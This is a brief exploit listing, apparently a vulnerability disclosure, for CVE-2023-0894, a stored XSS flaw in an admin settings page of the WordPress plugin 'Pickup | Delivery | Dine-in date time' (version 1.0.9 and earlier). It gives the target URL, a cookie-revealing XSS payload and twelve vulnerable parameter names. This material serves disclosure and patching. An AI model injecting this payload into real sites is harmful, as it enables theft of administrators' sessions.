Exploit for Pickup | Delivery | Dine-in date time <= 1.0.9 - Admin+ Stored XSS CVE-2023-0894

Name: Exploit for Pickup | Delivery | Dine-in date time <= 1.0.9 - Admin+ Stored XSS CVE-2023-0894
Rating: 5 (43 reviews)

2023-04-12 | CVSS 4.3

## https://sploitus.com/exploit?id=WPEX-ID:D42EFF41-096F-401D-BBFB-DCD6E08FACA5
Go to this page: https://example.com/wp-admin/admin.php?page=byconsolewooodtrestro_general_settings
on this page we have multiple forms. all of them are vulnerable to stored xss. 

xss payload: "><img src=x onerror=alert(document.cookie)>

vulnerable parameters: byconsolewooodtrestro_takeaway_lable , byconsolewooodtrestro_delivery_lable , byconsolewooodtrestro_dinein_lable , byconsolewooodtrestro_date_field_text , byconsolewooodtrestro_time_field_text , byconsolewooodtrestro_orders_delivered , byconsolewooodtrestro_orders_pick_up , byconsolewooodtrestro_orders_dinein , byconsolewooodtrestro_chekout_page_section_heading , byconsolewooodtrestro_chekout_page_order_type_label , byconsolewooodtrestro_chekout_page_date_label , byconsolewooodtrestro_chekout_page_time_label

After injecting these payloads and save the changes, any administrator will be targeted by visiting this page.